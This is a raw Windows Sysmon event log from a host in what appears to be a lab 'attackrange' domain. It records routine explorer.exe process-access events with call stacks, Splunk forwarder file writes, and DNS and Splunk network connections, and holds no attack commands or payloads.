16:52:29.575{05ADC7E1-59B2-603E-BEA7-00000000AD01}1618014068C:\Windows\explorer.exe{05ADC7E1-5AE8-603E-EFA7-00000000AD01}7872C:\Windows\explorer.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\System32\SHCORE.dll+64c8|C:\Windows\System32\SHCORE.dll+1c0e5|C:\Windows\System32\SHELL32.dll+a455f|C:\Windows\System32\SHELL32.dll+a5e58|C:\Windows\System32\SHELL32.dll+a2ac5|C:\Windows\System32\USER32.dll+121e4|C:\Windows\System32\USER32.dll+11b2c|C:\Windows\System32\SHELL32.dll+a68ba|C:\Windows\System32\SHELL32.dll+6728a|C:\Windows\System32\SHCORE.dll+33fad|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000002235434Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:52:29.575{05ADC7E1-59B2-603E-BEA7-00000000AD01}1618014068C:\Windows\explorer.exe{05ADC7E1-5AE8-603E-EFA7-00000000AD01}7872C:\Windows\explorer.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\System32\SHCORE.dll+64c8|C:\Windows\System32\SHCORE.dll+1c0e5|C:\Windows\System32\SHELL32.dll+a44ca|C:\Windows\System32\SHELL32.dll+a5e58|C:\Windows\System32\SHELL32.dll+a2ac5|C:\Windows\System32\USER32.dll+121e4|C:\Windows\System32\USER32.dll+11b2c|C:\Windows\System32\SHELL32.dll+a68ba|C:\Windows\System32\SHELL32.dll+6728a|C:\Windows\System32\SHCORE.dll+33fad|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000002235433Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:52:29.575{05ADC7E1-59B2-603E-BEA7-00000000AD01}1618014068C:\Windows\explorer.exe{05ADC7E1-5AE8-603E-EFA7-00000000AD01}7872C:\Windows\explorer.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\System32\SHCORE.dll+64c8|C:\Windows\System32\SHCORE.dll+6482|C:\Windows\System32\SHCORE.dll+617d|C:\Windows\System32\SHCORE.dll+5e3d|C:\Windows\System32\SHCORE.dll+5dcf|C:\Windows\System32\SHCORE.dll+5cd4|C:\Windows\System32\SHELL32.dll+a44a6|C:\Windows\System32\SHELL32.dll+a5e58|C:\Windows\System32\SHELL32.dll+a2ac5|C:\Windows\System32\USER32.dll+121e4|C:\Windows\System32\USER32.dll+11b2c|C:\Windows\System32\SHELL32.dll+a68ba|C:\Windows\System32\SHELL32.dll+6728a|C:\Windows\System32\SHCORE.dll+33fad|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000002235432Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:52:29.575{05ADC7E1-59B2-603E-BEA7-00000000AD01}1618014068C:\Windows\explorer.exe{05ADC7E1-5AE8-603E-EFA7-00000000AD01}7872C:\Windows\explorer.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\System32\SHCORE.dll+64c8|C:\Windows\System32\SHCORE.dll+6154|C:\Windows\System32\SHCORE.dll+5e3d|C:\Windows\System32\SHCORE.dll+5dcf|C:\Windows\System32\SHCORE.dll+5cd4|C:\Windows\System32\SHELL32.dll+a44a6|C:\Windows\System32\SHELL32.dll+a5e58|C:\Windows\System32\SHELL32.dll+a2ac5|C:\Windows\System32\USER32.dll+121e4|C:\Windows\System32\USER32.dll+11b2c|C:\Windows\System32\SHELL32.dll+a68ba|C:\Windows\System32\SHELL32.dll+6728a|C:\Windows\System32\SHCORE.dll+33fad|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000002235431Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:52:29.575{05ADC7E1-59B2-603E-BEA7-00000000AD01}1618014068C:\Windows\explorer.exe{05ADC7E1-5AE8-603E-EFA7-00000000AD01}7872C:\Windows\explorer.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\System32\SHCORE.dll+64c8|C:\Windows\System32\SHCORE.dll+1c0e5|C:\Windows\System32\SHELL32.dll+a455f|C:\Windows\System32\SHELL32.dll+a5e58|C:\Windows\System32\SHELL32.dll+a2ac5|C:\Windows\System32\USER32.dll+121e4|C:\Windows\System32\USER32.dll+11b2c|C:\Windows\System32\SHELL32.dll+a68ba|C:\Windows\System32\SHELL32.dll+6728a|C:\Windows\System32\SHCORE.dll+33fad|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000002235430Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:52:29.575{05ADC7E1-59B2-603E-BEA7-00000000AD01}1618014068C:\Windows\explorer.exe{05ADC7E1-5AE8-603E-EFA7-00000000AD01}7872C:\Windows\explorer.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\System32\SHCORE.dll+64c8|C:\Windows\System32\SHCORE.dll+1c0e5|C:\Windows\System32\SHELL32.dll+a44ca|C:\Windows\System32\SHELL32.dll+a5e58|C:\Windows\System32\SHELL32.dll+a2ac5|C:\Windows\System32\USER32.dll+121e4|C:\Windows\System32\USER32.dll+11b2c|C:\Windows\System32\SHELL32.dll+a68ba|C:\Windows\System32\SHELL32.dll+6728a|C:\Windows\System32\SHCORE.dll+33fad|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000002235429Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:52:29.575{05ADC7E1-59B2-603E-BEA7-00000000AD01}1618014068C:\Windows\explorer.exe{05ADC7E1-5AE8-603E-EFA7-00000000AD01}7872C:\Windows\explorer.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\System32\SHCORE.dll+64c8|C:\Windows\System32\SHCORE.dll+6482|C:\Windows\System32\SHCORE.dll+617d|C:\Windows\System32\SHCORE.dll+5e3d|C:\Windows\System32\SHCORE.dll+5dcf|C:\Windows\System32\SHCORE.dll+5cd4|C:\Windows\System32\SHELL32.dll+a44a6|C:\Windows\System32\SHELL32.dll+a5e58|C:\Windows\System32\SHELL32.dll+a2ac5|C:\Windows\System32\USER32.dll+121e4|C:\Windows\System32\USER32.dll+11b2c|C:\Windows\System32\SHELL32.dll+a68ba|C:\Windows\System32\SHELL32.dll+6728a|C:\Windows\System32\SHCORE.dll+33fad|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000002235428Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:52:29.575{05ADC7E1-59B2-603E-BEA7-00000000AD01}1618014068C:\Windows\explorer.exe{05ADC7E1-5AE8-603E-EFA7-00000000AD01}7872C:\Windows\explorer.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\System32\SHCORE.dll+64c8|C:\Windows\System32\SHCORE.dll+6154|C:\Windows\System32\SHCORE.dll+5e3d|C:\Windows\System32\SHCORE.dll+5dcf|C:\Windows\System32\SHCORE.dll+5cd4|C:\Windows\System32\SHELL32.dll+a44a6|C:\Windows\System32\SHELL32.dll+a5e58|C:\Windows\System32\SHELL32.dll+a2ac5|C:\Windows\System32\USER32.dll+121e4|C:\Windows\System32\USER32.dll+11b2c|C:\Windows\System32\SHELL32.dll+a68ba|C:\Windows\System32\SHELL32.dll+6728a|C:\Windows\System32\SHCORE.dll+33fad|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000002235427Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:52:29.575{05ADC7E1-59B2-603E-BEA7-00000000AD01}1618014068C:\Windows\explorer.exe{05ADC7E1-5AE8-603E-EFA7-00000000AD01}7872C:\Windows\explorer.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\System32\SHCORE.dll+64c8|C:\Windows\System32\SHCORE.dll+1c0e5|C:\Windows\System32\SHELL32.dll+a455f|C:\Windows\System32\SHELL32.dll+a5e58|C:\Windows\System32\SHELL32.dll+a2ac5|C:\Windows\System32\USER32.dll+121e4|C:\Windows\System32\USER32.dll+11b2c|C:\Windows\System32\SHELL32.dll+a68ba|C:\Windows\System32\SHELL32.dll+6728a|C:\Windows\System32\SHCORE.dll+33fad|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000002235426Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:52:29.575{05ADC7E1-59B2-603E-BEA7-00000000AD01}1618014068C:\Windows\explorer.exe{05ADC7E1-5AE8-603E-EFA7-00000000AD01}7872C:\Windows\explorer.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\System32\SHCORE.dll+64c8|C:\Windows\System32\SHCORE.dll+1c0e5|C:\Windows\System32\SHELL32.dll+a44ca|C:\Windows\System32\SHELL32.dll+a5e58|C:\Windows\System32\SHELL32.dll+a2ac5|C:\Windows\System32\USER32.dll+121e4|C:\Windows\System32\USER32.dll+11b2c|C:\Windows\System32\SHELL32.dll+a68ba|C:\Windows\System32\SHELL32.dll+6728a|C:\Windows\System32\SHCORE.dll+33fad|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000002235425Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:52:29.575{05ADC7E1-59B2-603E-BEA7-00000000AD01}1618014068C:\Windows\explorer.exe{05ADC7E1-5AE8-603E-EFA7-00000000AD01}7872C:\Windows\explorer.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\System32\SHCORE.dll+64c8|C:\Windows\System32\SHCORE.dll+6482|C:\Windows\System32\SHCORE.dll+617d|C:\Windows\System32\SHCORE.dll+5e3d|C:\Windows\System32\SHCORE.dll+5dcf|C:\Windows\System32\SHCORE.dll+5cd4|C:\Windows\System32\SHELL32.dll+a44a6|C:\Windows\System32\SHELL32.dll+a5e58|C:\Windows\System32\SHELL32.dll+a2ac5|C:\Windows\System32\USER32.dll+121e4|C:\Windows\System32\USER32.dll+11b2c|C:\Windows\System32\SHELL32.dll+a68ba|C:\Windows\System32\SHELL32.dll+6728a|C:\Windows\System32\SHCORE.dll+33fad|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000002235424Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:52:29.575{05ADC7E1-59B2-603E-BEA7-00000000AD01}1618014068C:\Windows\explorer.exe{05ADC7E1-5AE8-603E-EFA7-00000000AD01}7872C:\Windows\explorer.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\System32\SHCORE.dll+64c8|C:\Windows\System32\SHCORE.dll+6154|C:\Windows\System32\SHCORE.dll+5e3d|C:\Windows\System32\SHCORE.dll+5dcf|C:\Windows\System32\SHCORE.dll+5cd4|C:\Windows\System32\SHELL32.dll+a44a6|C:\Windows\System32\SHELL32.dll+a5e58|C:\Windows\System32\SHELL32.dll+a2ac5|C:\Windows\System32\USER32.dll+121e4|C:\Windows\System32\USER32.dll+11b2c|C:\Windows\System32\SHELL32.dll+a68ba|C:\Windows\System32\SHELL32.dll+6728a|C:\Windows\System32\SHCORE.dll+33fad|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000002235423Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:52:29.575{05ADC7E1-59B2-603E-BEA7-00000000AD01}1618014068C:\Windows\explorer.exe{05ADC7E1-5AE8-603E-EFA7-00000000AD01}7872C:\Windows\explorer.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\System32\SHCORE.dll+64c8|C:\Windows\System32\SHCORE.dll+1c0e5|C:\Windows\System32\SHELL32.dll+a455f|C:\Windows\System32\SHELL32.dll+a5e58|C:\Windows\System32\SHELL32.dll+a2ac5|C:\Windows\System32\USER32.dll+121e4|C:\Windows\System32\USER32.dll+11b2c|C:\Windows\System32\SHELL32.dll+a68ba|C:\Windows\System32\SHELL32.dll+6728a|C:\Windows\System32\SHCORE.dll+33fad|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000002235422Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:52:29.575{05ADC7E1-59B2-603E-BEA7-00000000AD01}1618014068C:\Windows\explorer.exe{05ADC7E1-5AE8-603E-EFA7-00000000AD01}7872C:\Windows\explorer.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\System32\SHCORE.dll+64c8|C:\Windows\System32\SHCORE.dll+1c0e5|C:\Windows\System32\SHELL32.dll+a44ca|C:\Windows\System32\SHELL32.dll+a5e58|C:\Windows\System32\SHELL32.dll+a2ac5|C:\Windows\System32\USER32.dll+121e4|C:\Windows\System32\USER32.dll+11b2c|C:\Windows\System32\SHELL32.dll+a68ba|C:\Windows\System32\SHELL32.dll+6728a|C:\Windows\System32\SHCORE.dll+33fad|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000002235421Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:52:29.575{05ADC7E1-59B2-603E-BEA7-00000000AD01}1618014068C:\Windows\explorer.exe{05ADC7E1-5AE8-603E-EFA7-00000000AD01}7872C:\Windows\explorer.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\System32\SHCORE.dll+64c8|C:\Windows\System32\SHCORE.dll+6482|C:\Windows\System32\SHCORE.dll+617d|C:\Windows\System32\SHCORE.dll+5e3d|C:\Windows\System32\SHCORE.dll+5dcf|C:\Windows\System32\SHCORE.dll+5cd4|C:\Windows\System32\SHELL32.dll+a44a6|C:\Windows\System32\SHELL32.dll+a5e58|C:\Windows\System32\SHELL32.dll+a2ac5|C:\Windows\System32\USER32.dll+121e4|C:\Windows\System32\USER32.dll+11b2c|C:\Windows\System32\SHELL32.dll+a68ba|C:\Windows\System32\SHELL32.dll+6728a|C:\Windows\System32\SHCORE.dll+33fad|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000002235420Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:52:29.575{05ADC7E1-59B2-603E-BEA7-00000000AD01}1618014068C:\Windows\explorer.exe{05ADC7E1-5AE8-603E-EFA7-00000000AD01}7872C:\Windows\explorer.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\System32\SHCORE.dll+64c8|C:\Windows\System32\SHCORE.dll+6154|C:\Windows\System32\SHCORE.dll+5e3d|C:\Windows\System32\SHCORE.dll+5dcf|C:\Windows\System32\SHCORE.dll+5cd4|C:\Windows\System32\SHELL32.dll+a44a6|C:\Windows\System32\SHELL32.dll+a5e58|C:\Windows\System32\SHELL32.dll+a2ac5|C:\Windows\System32\USER32.dll+121e4|C:\Windows\System32\USER32.dll+11b2c|C:\Windows\System32\SHELL32.dll+a68ba|C:\Windows\System32\SHELL32.dll+6728a|C:\Windows\System32\SHCORE.dll+33fad|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000002235419Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:52:29.575{05ADC7E1-59B2-603E-BEA7-00000000AD01}1618014068C:\Windows\explorer.exe{05ADC7E1-7946-6039-1610-00000000AD01}3144C:\Program Files\Mozilla Firefox\firefox.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\System32\SHCORE.dll+64c8|C:\Windows\System32\SHCORE.dll+6497|C:\Windows\System32\SHCORE.dll+6387|C:\Windows\System32\SHCORE.dll+62fd|C:\Windows\System32\SHCORE.dll+620a|C:\Windows\System32\SHELL32.dll+a3000|C:\Windows\System32\USER32.dll+121e4|C:\Windows\System32\USER32.dll+11ed7|C:\Windows\System32\USER32.dll+22a53|C:\Windows\SYSTEM32\ntdll.dll+a9764|UNKNOWN(FFFFF80071E698C8)|UNKNOWN(FFFF9F0F018B4978)|UNKNOWN(FFFF9F0F018B4AF7)|UNKNOWN(FFFF9F0F018AF181)|UNKNOWN(FFFF9F0F018B0B4A)|UNKNOWN(FFFF9F0F018AEE06)|UNKNOWN(FFFFF80071B80E03)|C:\Windows\System32\win32u.dll+10c4|C:\Windows\System32\USER32.dll+1ea2e|C:\Windows\System32\SHELL32.dll+a686b|C:\Windows\System32\SHELL32.dll+6728a|C:\Windows\System32\SHCORE.dll+33fad 10341000x80000000000000002235418Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:52:29.575{05ADC7E1-59B2-603E-BEA7-00000000AD01}1618014068C:\Windows\explorer.exe{05ADC7E1-7946-6039-1610-00000000AD01}3144C:\Program Files\Mozilla Firefox\firefox.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\System32\SHCORE.dll+64c8|C:\Windows\System32\SHCORE.dll+1c0e5|C:\Windows\System32\SHELL32.dll+a2ae1|C:\Windows\System32\USER32.dll+121e4|C:\Windows\System32\USER32.dll+11ed7|C:\Windows\System32\USER32.dll+22a53|C:\Windows\SYSTEM32\ntdll.dll+a9764|UNKNOWN(FFFFF80071E698C8)|UNKNOWN(FFFF9F0F018B4978)|UNKNOWN(FFFF9F0F018B4AF7)|UNKNOWN(FFFF9F0F018AF181)|UNKNOWN(FFFF9F0F018B0B4A)|UNKNOWN(FFFF9F0F018AEE06)|UNKNOWN(FFFFF80071B80E03)|C:\Windows\System32\win32u.dll+10c4|C:\Windows\System32\USER32.dll+1ea2e|C:\Windows\System32\SHELL32.dll+a686b|C:\Windows\System32\SHELL32.dll+6728a|C:\Windows\System32\SHCORE.dll+33fad|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 23542300x80000000000000002235417Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:52:29.575{05ADC7E1-7946-6039-1610-00000000AD01}3144ATTACKRANGE\AdministratorC:\Program Files\Mozilla Firefox\firefox.exeC:\Users\Administrator\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\6824f4a902c78fbd.customDestinations-ms~RF14abbd7c.TMPMD5=7ED4FCCE7414B027854B506D51B2B49E,SHA256=185C52DDCA05970B7B69B09BBD46958E66B20179F97DF76048323B4BD2D9BCBB,IMPHASH=00000000000000000000000000000000falsetrue 23542300x80000000000000002235416Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:52:29.403{05ADC7E1-FB2E-603C-9079-00000000AD01}4328NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=C29AE4DB90C011A9F7AB5FE642811E89,SHA256=2CADC2F8FB0D024A1D40A53C84B1B2347A7A869CE6D5B4C3516D315DF91BA938,IMPHASH=00000000000000000000000000000000falsetrue 23542300x80000000000000002236225Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:52:30.700{05ADC7E1-FB2E-603C-9079-00000000AD01}4328NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\SecurityMD5=7BBB1B6929A77FBA4140EF3F45B90557,SHA256=28E743B35CAEE98312E53938FBC24755AF612B5ADEB5AF31FCED48A82D7E5E75,IMPHASH=00000000000000000000000000000000falsetrue 354300x80000000000000002236224Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:52:19.826{05ADC7E1-22AF-6039-2D00-00000000AD01}2664C:\Windows\System32\dns.exeNT AUTHORITY\SYSTEMudptruetruefe80:0:0:0:0:ffff:ffff:fffe-63084-true2001:500:2d:0:0:0:0:dd.root-servers.net53domain 354300x80000000000000002236223Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:52:19.822{05ADC7E1-22AF-6039-2D00-00000000AD01}2664C:\Windows\System32\dns.exeNT AUTHORITY\SYSTEMudpfalsetrue0:0:0:0:0:0:0:1win-dc-974.attackrange.local53domaintrue0:0:0:0:0:0:0:1win-dc-974.attackrange.local52986- 23542300x80000000000000002236222Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:52:30.423{05ADC7E1-FB2E-603C-9079-00000000AD01}4328NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=CF84422E126205B84EF73EAE6153BF73,SHA256=EB493F78BDC3F05DC4C7C78E2580A838418FEAEA70F870BBC9B35517DC19F3A7,IMPHASH=00000000000000000000000000000000falsetrue 354300x80000000000000002236227Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:52:20.837{05ADC7E1-22AF-6039-2D00-00000000AD01}2664C:\Windows\System32\dns.exeNT AUTHORITY\SYSTEMudpfalsefalse127.0.0.1win-dc-974.attackrange.local53domainfalse127.0.0.1win-dc-974.attackrange.local52986- 23542300x80000000000000002236226Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:52:31.434{05ADC7E1-FB2E-603C-9079-00000000AD01}4328NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=C4C9E1D431853DF8A4AC69DDF4D9E519,SHA256=70C450B563368B2872A38AC9E210CE517FE82C1661BE49847C5102C63D5F32C6,IMPHASH=00000000000000000000000000000000falsetrue 354300x80000000000000002236230Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:52:22.322{05ADC7E1-FB27-603C-8779-00000000AD01}2272C:\Program Files\SplunkUniversalForwarder\etc\apps\Splunk_TA_stream\windows_x86_64\bin\streamfwd.exeNT AUTHORITY\SYSTEMtcptruefalse10.0.1.14win-dc-974.attackrange.local60123-false10.0.1.12-8000- 23542300x80000000000000002236229Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:52:32.465{05ADC7E1-FB2E-603C-9079-00000000AD01}4328NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=EBDBAF14343CBAB82F526D31A1371A72,SHA256=FC753E8578CB98753E2F7CC90250BA0B5F787A9F8359AD73AD724A9204AE264A,IMPHASH=00000000000000000000000000000000falsetrue 23542300x80000000000000002236228Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:52:32.200{05ADC7E1-FB2E-603C-9079-00000000AD01}4328NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\SecurityMD5=163703B222AB5BC499D643C7C8030307,SHA256=A294210F2C9AFDA2327EB4D2C9D78D00DC7BC6FD54B74B62041529C4BEB2E5ED,IMPHASH=00000000000000000000000000000000falsetrue 23542300x80000000000000002236232Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:52:33.481{05ADC7E1-FB2E-603C-9079-00000000AD01}4328NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=1FC691A7457834E7932659736C533424,SHA256=1181C96A97AFAA50702D0508DD3D99860F812AD2F0CFC6D2C37B43B25F28FFD3,IMPHASH=00000000000000000000000000000000falsetrue 23542300x80000000000000002236231Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:52:33.423{05ADC7E1-FB2E-603C-9079-00000000AD01}4328NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\SecurityMD5=79E790CF3C652293992440E91D6F5D10,SHA256=067721EB2B734DA20583D5471EF53420A096778F1B2CE13B3AE9B1DED996A6FF,IMPHASH=00000000000000000000000000000000falsetrue 23542300x80000000000000002236234Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:52:34.700{05ADC7E1-FB2E-603C-9079-00000000AD01}4328NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-PowerShell_OperationalMD5=385D5D041BD767B76CB75A039AE6A5E5,SHA256=51A044A38C8B84A4D1781DD6AF8E77B53CC49B39C145A8378C4111835BFE6201,IMPHASH=00000000000000000000000000000000falsetrue 23542300x80000000000000002236233Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:52:34.518{05ADC7E1-FB2E-603C-9079-00000000AD01}4328NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=536FC8984FA83786210A23FDFD5DAA3F,SHA256=A5582C1829708B8AD1667BEF298B3FD79E30896ACC6D52988606813BE19B5987,IMPHASH=00000000000000000000000000000000falsetrue 23542300x80000000000000002236235Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:52:35.543{05ADC7E1-FB2E-603C-9079-00000000AD01}4328NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=F96DC5C1FEA65F1E3B0F63804F38BA41,SHA256=B5B01FDD65ADEDD9D6EA2C493E7795CF229D607D6DAC591755646B0427AC27CA,IMPHASH=00000000000000000000000000000000falsetrue 23542300x80000000000000002236237Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:52:36.575{05ADC7E1-FB2E-603C-9079-00000000AD01}4328NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=7345106D3D9959404476459287BE09A8,SHA256=DD023B8258046D1BA2AA148C0691AB0C189B33D2165664C28CD2754C4688992D,IMPHASH=00000000000000000000000000000000falsetrue 23542300x80000000000000002236236Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:52:36.340{05ADC7E1-FB1F-603C-5979-00000000AD01}6484NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunkd.exeC:\Program Files\SplunkUniversalForwarder\var\run\serverclass.xmlMD5=D04DD730C2DFA173B41D98E6E0FBCE24,SHA256=25BD0354816452BB32A75B30DADE46EF8E59DD04BE7128F431B20468F632A399,IMPHASH=00000000000000000000000000000000falsetrue 354300x80000000000000002236241Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:52:27.494{05ADC7E1-FB1F-603C-5979-00000000AD01}6484C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exeNT AUTHORITY\SYSTEMtcptruefalse10.0.1.14win-dc-974.attackrange.local60125-false10.0.1.12-8089- 354300x80000000000000002236240Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 